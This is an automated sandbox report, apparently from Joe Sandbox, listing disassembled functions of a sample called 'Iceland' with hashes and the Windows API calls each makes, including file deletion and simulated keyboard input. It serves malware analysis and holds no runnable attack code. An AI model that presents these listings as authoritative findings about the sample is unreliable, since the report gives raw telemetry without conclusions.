Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 2034a8b33131b1122b4cf14f0ee31fd415486800c1f8ae606c1279f8732a0775
Instruction ID: e0f73ac63a8b6a609d031462b5d16cd5517afbd486d41414ceaf6cadcdeddc55
Opcode Fuzzy Hash: 2034a8b33131b1122b4cf14f0ee31fd415486800c1f8ae606c1279f8732a0775
Instruction Fuzzy Hash: C2D11775A1420AEFCF14EF98D481AEDBBB5FF48314F144159E915AB291DB30AE81CB90

Function 0093F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f107b0c5d3b7f5c8bf8b341882eb944583bc540a297a073322f0358af28cf6f
Instruction ID: 4fdcbde8b347f8b93de1ed89899969e02a5c53f407248e091128974118a3ebf2
Opcode Fuzzy Hash: 2f107b0c5d3b7f5c8bf8b341882eb944583bc540a297a073322f0358af28cf6f
Instruction Fuzzy Hash: 1B51C835E04104EFDB10DF68C861F6A7BA6EF85364F198168E8189B391D731DD42CF90

Function 0097FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0097FCCE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 691da69c86e960af94c83383624d91a89e03e453f2b65a2b3fe2c1c6e0cc66b0
Instruction ID: 66fd532740ed3f57fc2db644693a7f902cabae65c8a3f97be46b58f7cacfc058
Opcode Fuzzy Hash: 691da69c86e960af94c83383624d91a89e03e453f2b65a2b3fe2c1c6e0cc66b0
Instruction Fuzzy Hash: 0941A777500209AFCB21DF68C891AAE77F9EF84314B10853EE55AA7291DB70DE45CB50

Function 00916679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0091663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0091668B,?,?,009162FA,?,00000001,?,?,00000000), ref: 0091664A
Part of subcall function 0091663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0091665C
Part of subcall function 0091663E: FreeLibrary.KERNEL32(00000000,?,?,0091668B,?,?,009162FA,?,00000001,?,?,00000000), ref: 0091666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009162FA,?,00000001,?,?,00000000), ref: 009166AB

Part of subcall function 00916607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00955657,?,?,009162FA,?,00000001,?,?,00000000), ref: 00916610
Part of subcall function 00916607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00916622
Part of subcall function 00916607: FreeLibrary.KERNEL32(00000000,?,?,00955657,?,?,009162FA,?,00000001,?,?,00000000), ref: 00916635

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 1577c0b05d1b25d55ad5daefeac8269c66437538eaf99226e9f5f37b314e8cfd
Instruction ID: c942ffd89ecce3c198d73a7b0176147dc0cc2d13dec76d1fca5fd5f2353b2c19
Opcode Fuzzy Hash: 1577c0b05d1b25d55ad5daefeac8269c66437538eaf99226e9f5f37b314e8cfd
Instruction Fuzzy Hash: 7E11E772B00209EACF14FB20CD02BED77A59F90751F10882DF492A61C2DE75DA85DB50

Function 00948782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 009487C0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 0990ace5b9fde26653ec71cc70366a66cdfef62933cf7f7ac51c3286b397ff98
Instruction ID: 2498f00bbc8ce90025076f282cd3d81d90cab9a101b96480586ca6c204ffd3c3
Opcode Fuzzy Hash: 0990ace5b9fde26653ec71cc70366a66cdfef62933cf7f7ac51c3286b397ff98
Instruction Fuzzy Hash: EF11187590420AAFCF05DF58E945E9F7BF8EF48310F1141A9F809AB311DA31EA21CB65

Function 00945373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00944FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0094319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00945031

_free.LIBCMT ref: 009453DF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: d596647b947e3f41d822b484a15e4598079ad9b3637aa32c7826e587e2ba62de
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 9801D672600705ABE3219F69D881E5AFBEDEBC5370F650A2DE58483281EB70A905C764

Function 0093E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 45d8b731ffe822546b46dde87bf6b17bda33828c912d5d571f247248e38ba3b4
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: AAF0C836911A2497D6323A6A9C05F5B33989FC2334F204B26F965971D2EB74E8028FD2

Function 0091B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0091B333

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
Instruction ID: 17a247c365b778fe92271f22cd0f36945baeaf37c2b62f4e89b24407486327b6
Opcode Fuzzy Hash: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
Instruction Fuzzy Hash: 7FF0C8B36017046ED7149F68DC06BA7BB99EB84760F10862AFA19CB1D1DB31E550CBA0

Function 0098F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0098F987

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 7ad657b37386507b11df68a8080f46a3e75b2193db7a52da9193228275b64c23
Instruction ID: ea1e1b6c6479a77141e242be5f6423fb3745ae2ad83ddfac6fd5df3c0a21ae0d
Opcode Fuzzy Hash: 7ad657b37386507b11df68a8080f46a3e75b2193db7a52da9193228275b64c23
Instruction Fuzzy Hash: 28F01972604204BFCB01EBA5D84AE9F7BA8EF89720F004055F505AB261EA70AA81CB61

Function 00944FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0094319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00945031

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a554a5d1a83513ba3e62fdeabcd4cadc8e11c95431643123f4338f137efa3c58
Instruction ID: a7b16067952deb1e2eefc7105ea8fa57c6e0053de34afc14b2e00983aeac456c
Opcode Fuzzy Hash: a554a5d1a83513ba3e62fdeabcd4cadc8e11c95431643123f4338f137efa3c58
Instruction Fuzzy Hash: 22F0E23A615E24A7DB312FA6DC01F5B374CAF817E0F178021B81CEB092DA74DC019AE0

Function 00943B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00936A79,?,0000015D,?,?,?,?,009385B0,000000FF,00000000,?,?), ref: 00943BC5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 75af68d1dcdefe26424e743d1854b06b1e29d86212c501568e9862b6e5aac2cc
Instruction ID: 4e684ae2906e873f8cb55c5f3ec6bb91130ba327b7b8c44e33c9e90cbed99b1a
Opcode Fuzzy Hash: 75af68d1dcdefe26424e743d1854b06b1e29d86212c501568e9862b6e5aac2cc
Instruction Fuzzy Hash: DEE09231265620A6EA2137769C02F7B3A4CEF817A0F168161FC65D6A91DF74CE4099E1

Function 009166E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16ec99dec66f030603584761cd5744d7e7e74d191db70097addcf05a8ecbb60
Instruction ID: f77441d2b3e72d4f9adf8a5584cc857f23badfff08a25a72d55ddbc798db3727
Opcode Fuzzy Hash: a16ec99dec66f030603584761cd5744d7e7e74d191db70097addcf05a8ecbb60
Instruction Fuzzy Hash: 9CF0A970606702CFCB349F64D8A0892BBF8BF0032A3208D7EE5C782610C7319884DF50

Function 00966AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00966AE0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 592285ea67d53779d20a291e65416c5a0e1e89cd03978db3a59d7d5f9593f963
Instruction ID: 433e66963122c69c0494847831d402e8cd6079957973dd9527e9e152d47b852c
Opcode Fuzzy Hash: 592285ea67d53779d20a291e65416c5a0e1e89cd03978db3a59d7d5f9593f963
Instruction Fuzzy Hash: 6BF0E571708600AAD7204FB4A8157A1F7E8BB51314F104A1ED4D583181C7B654E49791

Function 0091684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00916868

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: a9f1e9c18ff3d4c695dad2f8bbc85bd47740bcf0026678a7970715bc6d1d9628
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 9CF0F87550020DFFDF05DF90C941E9E7B79FB08318F208485F9159A151C336EA61EBA1

Function 00913907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00913963

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 7b580164998045d6fd6b5e11de000a8fa6ed128268344026e624dc19f6237621
Instruction ID: c6fcc18be487d146c9461b73f9453e909e7bef8e52f128055699df1bbd96bb20
Opcode Fuzzy Hash: 7b580164998045d6fd6b5e11de000a8fa6ed128268344026e624dc19f6237621
Instruction Fuzzy Hash: 07F06C709183589FE756DF24DC467D57BFCAB05B0CF0040E5A6849B191D7745B88CF91

Function 00913A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00913A76

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 210b6fa0f23666014ca3f98242f1ef212b294ed3bb981887b6aa40a13d3991ff
Instruction ID: f06378c811a4225abddd637812ada050f417214d0d5aef5ab5aa2392ba7bbdef
Opcode Fuzzy Hash: 210b6fa0f23666014ca3f98242f1ef212b294ed3bb981887b6aa40a13d3991ff
Instruction Fuzzy Hash: B0E08C76A002285BCB20A3589C06FEA77ADDFC97A0F4440B1BC09D7258D960AD809690

Function 0095071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00950A84,?,?,00000000,?,00950A84,00000000,0000000C), ref: 00950737

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: acf6e7614504be24698646c0ee7defa31b2536490abaff8e1c1e03f5e0ba7607
Instruction ID: 5fd6ad5eb9692e18d3ca10cf9998e158bd48b7dc477a79a98388aec124e54522
Opcode Fuzzy Hash: acf6e7614504be24698646c0ee7defa31b2536490abaff8e1c1e03f5e0ba7607
Instruction Fuzzy Hash: 56D06C3211410DBBDF028F84DD06EDA3BAAFB48714F014000BE5856020C736E821AB90

Function 0097EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0097D840), ref: 0097EAB1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fefae33a77b07e0326810c2c40790068c905f4eac2af9326e6e0a18b8f0e20f5
Instruction ID: fb9f42908ba1a034227411e510f563d619b6dcc16892317354eb3ed6c04327d3
Opcode Fuzzy Hash: fefae33a77b07e0326810c2c40790068c905f4eac2af9326e6e0a18b8f0e20f5
Instruction Fuzzy Hash: DBB0922581560005AD2C4A385A09A99330C78473A57DC5BC0E87E854F1C3398C0FE990

Function 0098664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0097DC54: FindFirstFileW.KERNEL32(?,?), ref: 0097DCCB
Part of subcall function 0097DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0097DD1B
Part of subcall function 0097DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0097DD2C
Part of subcall function 0097DC54: FindClose.KERNEL32(00000000), ref: 0097DD43

GetLastError.KERNEL32 ref: 0098666E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 97e56c00f2a13da593d47caadb05e354a797bfb4eb0c3698594e14a193cea93f
Instruction ID: 5acab331035584138857c30d212d088ca4b7e5a9e1b260750c49f4419cced149
Opcode Fuzzy Hash: 97e56c00f2a13da593d47caadb05e354a797bfb4eb0c3698594e14a193cea93f
Instruction Fuzzy Hash: 33F08C363042049FCB10EF58D845BAEBBE9AFC9360F048409F94A8B352CB70BC41CB90

Non-executed Functions

Function 0092FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0092FC86
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096FCB8
IsIconic.USER32(00000000), ref: 0096FCC1
ShowWindow.USER32(00000000,00000009), ref: 0096FCCE
SetForegroundWindow.USER32(00000000), ref: 0096FCD8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096FCEE
GetCurrentThreadId.KERNEL32 ref: 0096FCF5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096FD01
AttachThreadInput.USER32(?,00000000,00000001), ref: 0096FD12
AttachThreadInput.USER32(?,00000000,00000001), ref: 0096FD1A
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0096FD22
SetForegroundWindow.USER32(00000000), ref: 0096FD25
MapVirtualKeyW.USER32(00000012,00000000), ref: 0096FD3A
keybd_event.USER32(00000012,00000000), ref: 0096FD45
MapVirtualKeyW.USER32(00000012,00000000), ref: 0096FD4F
keybd_event.USER32(00000012,00000000), ref: 0096FD54
MapVirtualKeyW.USER32(00000012,00000000), ref: 0096FD5D
keybd_event.USER32(00000012,00000000), ref: 0096FD62
MapVirtualKeyW.USER32(00000012,00000000), ref: 0096FD6C
keybd_event.USER32(00000012,00000000), ref: 0096FD71
SetForegroundWindow.USER32(00000000), ref: 0096FD74
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0096FD9B

Strings

Shell_TrayWnd, xrefs: 0096FCB3

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

